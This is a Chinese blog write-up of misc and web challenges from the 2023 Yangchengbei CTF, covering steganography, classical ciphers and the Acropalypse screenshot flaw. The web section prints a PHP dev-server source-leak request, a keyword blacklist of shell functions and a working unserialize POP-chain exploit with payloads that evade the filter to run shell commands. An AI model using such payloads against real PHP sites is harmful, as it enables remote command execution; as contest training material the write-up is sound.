2023年“羊城杯”网络安全大赛 题解报告

发布于 2023-09-03  0 次阅读

内容 隐藏
1 ai和nia的交响曲
2 EZ_misc
3 程序猿Quby
4 D0n't pl4y g4m3!!!
5 Matryoshka

ai和nia的交响曲

追踪流量,得到flag1.png和flag2.zip

flag1.png

flag1

flag2.zip: 504B030414000900080026981057A71C18AA9C0000000F02000009000000666C6167322E7478747551C111032108FC5B0DE77D12ABB300E8840EF2482F36702D442070DC99CC308EECC2BA204083BD8CCEA3E3F17A5B8C4E86C064C132855161D60B15A70C8FEE19AD6E457A772D206F44174165414ECB3DCED2A9F08722E97DAEA48AF38287814BA459391570F8F4E928E97CAD89F3804C22CEE96DABC2DA1A63E0B4C16CCEDE6699E8A12FDEF9A509D3CEE9A79EECFF2E159B975F6B15F26765850F504B0102140014000900080026981057A71C18AA9C0000000F020000090024000000000000002000000000000000666C6167322E7478740A00200000000000010018004929A7F730D0D901A469FC9D3BD0D9012813D4592FD0D901504B050600000000010001005B000000C30000000000

EZ_misc

拿到图片,修改宽高

image-20230902113410308

binwalk分析

image-20230902133249585

有个zip,但是文件头是504b0403,改回来(504b0304),得到一个文本文档

vzbtrvplnnvphsqkxsiqibroou

同时winhex里还有一个hint:fivenumbers

image-20230902113539917

由文件名feld.txt可知,这个是格罗斯费尔德密码(Gronsfeld cipher)

使用karma9874/CryptAnalysis: Cryptanalysis of classical ciphers - Gronsfeld Cipher (github.com)工具破解

得到klen 5 key - [28303] TRYTOTHINKTHESNIPPINGTOOLS

image-20230902132808530

看到关键词截图工具,稍微查了一下,可以知道这个是CVE-2023-28303漏洞

首先回来爆破一下原图片宽高

import zlib
import struct
import argparse
import itertools


parser = argparse.ArgumentParser()
parser.add_argument("-f", type=str, default=None, required=True,
                    help="输入同级目录下图片的名称")
args  = parser.parse_args()


bin_data = open(args.f, 'rb').read()
crc32key = zlib.crc32(bin_data[12:29]) # 计算crc
original_crc32 = int(bin_data[29:33].hex(), 16) # 原始crc


if crc32key == original_crc32: # 计算crc对比原始crc
    print('宽高没有问题!')
else:
    input_ = input("宽高被改了, 是否CRC爆破宽高? (Y/n):")
    if input_ not in ["Y", "y", ""]:
        exit()
    else: 
        for i, j in itertools.product(range(4095), range(4095)): # 理论上0x FF FF FF FF,但考虑到屏幕实际/cpu,0x 0F FF就差不多了,也就是4095宽度和高度
            data = bin_data[12:16] + struct.pack('>i', i) + struct.pack('>i', j) + bin_data[24:29]
            crc32 = zlib.crc32(data)
            if(crc32 == original_crc32): # 计算当图片大小为i:j时的CRC校验值,与图片中的CRC比较,当相同,则图片大小已经确定
                print(f"\nCRC32: {hex(original_crc32)}")
                print(f"宽度: {i}, hex: {hex(i)}")
                print(f"高度: {j}, hex: {hex(j)}")
                exit(0)
image-20230902135651627
CRC32: 0x9d223066
宽度: 356, hex: 0x164
高度: 138, hex: 0x8a

后来发现没什么用,不用管了

使用小工具frankthetank-music/Acropalypse-Multi-Tool: Easily detect and restore Acropalypse vulnerable PNG and GIF files with simple Python GUI. (github.com)爆破

*参考CTF 2023 の Misc の snippingTools のWP_Fab1an的博客-CSDN博客

image-20230902141120411

得到flag

image-20230902141444103
image-20230902141449111

程序猿Quby

image-20230902113803849

根据夏多密码,得到密文haveaniceday

image-20230902113821479
image-20230902113933662
image-20230902113939970

D0n't pl4y g4m3!!!

拦截302重定向,得到hint

image-20230902120452314
Ö_0 0vO Ow0 0w0 Ö_0 Ö_O Ö.O o_o 0.O OvO o.0 owo o.Ö Ö.Ö Ovo 0_Ö Ö_o owO O.0 owo Ö_o owO O.0 owo Ö_0 0wÖ O.0 0w0 Ö_0 OwO ov0 owo o_O O.Ö Övo

使用在线工具得到解码后的hint

https://github.com/SnailSword/zdjd

image-20230902120640364

flag在/tmp/catcatf1ag.txt

利用PHP<=7.4.21 Development Server源码泄露漏洞暴露php源码

PHP<=7.4.21 Development Server源码泄露漏洞_这周末在做梦的博客-CSDN博客

GET /p0p.php HTTP/1.1
Host: 20890.endpoint-2fd8419b2abc4a4fac2d7bdf59526c27.m.ins.cloud.dasctf.com:20890



GET / HTTP/1.1
image-20230902121508804
HTTP/1.1 200 OK
Host: 20890.endpoint-2fd8419b2abc4a4fac2d7bdf59526c27.m.ins.cloud.dasctf.com:20890
Date: Sat, 02 Sep 2023 04:14:39 GMT
Connection: close
Content-Length: 1444

<?php
header("HTTP/1.1 302 found");
header("Location:https://passer-by.com/pacman/");

class Pro{
    private $exp;
    private $rce2;

    public function __get($name)
    {
        return $this->$rce2=$this->exp[$rce2];
    }
    public  function __toString()
    {
            call_user_func('system', "cat /flag");
     }
}

class Yang
{
    public function __call($name, $ary)
    {
        if ($this->key === true || $this->finish1->name) {
            if ($this->finish->finish) {
                call_user_func($this->now[$name], $ary[0]);
            }
        }
    }
    public function ycb()
    {
        $this->now = 0;
        return $this->finish->finish;
    }
    public function __wakeup()
    {
        $this->key = True;
    }
}
class Cheng
{
    private $finish;
    public $name;
    public function __get($value)
    {

        return $this->$value = $this->name[$value];
    }
}
class Bei
{
    public function __destruct()
    {
        if ($this->CTF->ycb()) {
            $this->fine->YCB1($this->rce, $this->rce1);
        }
    }
    public function __wakeup()
    {
        $this->key = false;
    }
}

function prohib($a){
    $filter = "/system|exec|passthru|shell_exec|popen|proc_open|pcntl_exec|eval|flag/i";
    return preg_replace($filter,'',$a);
}

$a = $_POST["CTF"];
if (isset($a)){
  unserialize(prohib($a));
}
?>
# ./有hint.zip

做反序列化

<?php
// header("HTTP/1.1 302 found");
// header("Location:https://passer-by.com/pacman/");

class Pro{
    private $exp;
    private $rce2;

    public function __get($name)
    {
        return $this->$rce2=$this->exp[$rce2];
    }
    public  function __toString()
    {
        call_user_func('system', "cat /flag");
    }
}

class Yang
{
    public function __call($name, $ary)
    {
        if ($this->key === true || $this->finish1->name) {
            if ($this->finish->finish) {
                call_user_func($this->now[$name], $ary[0]);
            }
        }
    }
    public function ycb()
    {
        $this->now = 0;
        return $this->finish->finish;
    }
    public function __wakeup()
    {
        $this->key = True;
    }
}
class Cheng
{
    private $finish;
    public $name;
    public function __get($value)
    {

        return $this->$value = $this->name[$value];
    }
}
class Bei
{
    public function __destruct()
    {
        if ($this->CTF->ycb()) {
            $this->fine->YCB1($this->rce, $this->rce1);
        }
    }
    public function __wakeup()
    {
        $this->key = false;
    }
}

function prohib($a){
    $filter = "/system|exec|passthru|shell_exec|popen|proc_open|pcntl_exec|eval|flag/i";

    return preg_replace($filter,'',$a);
}
$bei1 = new Bei();
$bei1->CTF = new Yang();
$bei1->CTF->finish = new Cheng();
$bei1->CTF->finish->name = array("finish"=>true);

$bei1->fine = new Yang();
$bei1->rce = "cat /tmp/catcatf1ag.txt";

$bei1->fine->finish1 = new Pro();
$bei1->fine->finish1->name = true;
$bei1->fine->finish = new Cheng();
$bei1->fine->finish->name = array("finish"=>true);

$bei1->fine->now = array("YCB1"=>"ssystemystem");
$a =  serialize($bei1);
$a = str_replace("12","6",$a);
echo $a;
?>

不知道为什么郑佬的exp只有郑佬自己电脑能跑,我吃现成的就跑不了

不劳而获饭好吃吗?非常好吃

CTF=O:3:"Bei":3:{s:3:"CTF";O:4:"Yang":1:{s:6:"finish";O:5:"Cheng":2:{s:13:"+Cheng+finish";N;s:4:"name";a:1:{s:6:"finish";b:1;}}}s:4:"fine";O:4:"Yang":3:{s:7:"finish1";O:3:"Pro":3:{s:8:"+Pro+exp";N;s:9:"+Pro+rce2";N;s:4:"name";b:1;}s:6:"finish";O:5:"Cheng":2:{s:13:"+Cheng+finish";N;s:4:"name";a:1:{s:6:"finish";b:1;}}s:3:"now";a:1:{s:4:"YCB1";s:6:"syssystemtem";}}s:3:"rce";s:23:"cat+/tmp/catcatf1ag.txt";}

O:3:"Bei":3:{s:3:"CTF";O:4:"Yang":1:{s:6:"finish";O:5:"Cheng":2:{s:13:"Chengfinish";N;s:4:"name";a:1:{s:6:"finish";b:1;}}}s:4:"fine";O:4:"Yang":3:{s:7:"finish1";O:3:"Pro":3:{s:8:"Proexp";N;s:9:"Prorce2";N;s:4:"name";b:1;}s:6:"finish";O:5:"Cheng":2:{s:13:"Chengfinish";N;s:4:"name";a:1:{s:6:"finish";b:1;}}s:3:"now";a:1:{s:4:"YCB1";s:6:"syssystemtem";}}s:3:"rce";s:2:"ls";}
image-20230902124359344

Matryoshka

首先做下取证

image-20230902155728500

拿到取证报告和相关资源文件

image-20230902155835171

压缩文件里的注释提示有盲水印

image-20230902160311517
image-20230902160228066
image-20230902155842039

binwalk拆不出来,文件体积却大了好几倍,盲水印没跑了,先上Stegsolve看看

image-20230902160209894

有数据在,拿BlindWaterMark解一下,得到flag

bwm.py decode not_real_cat.jpg 0000005_Carved.jpg flag.png

image-20230902161413095
image-20230902161520676

若金色的阳光停止了它耀眼的光芒,你的一个微笑,将照亮我的整个世界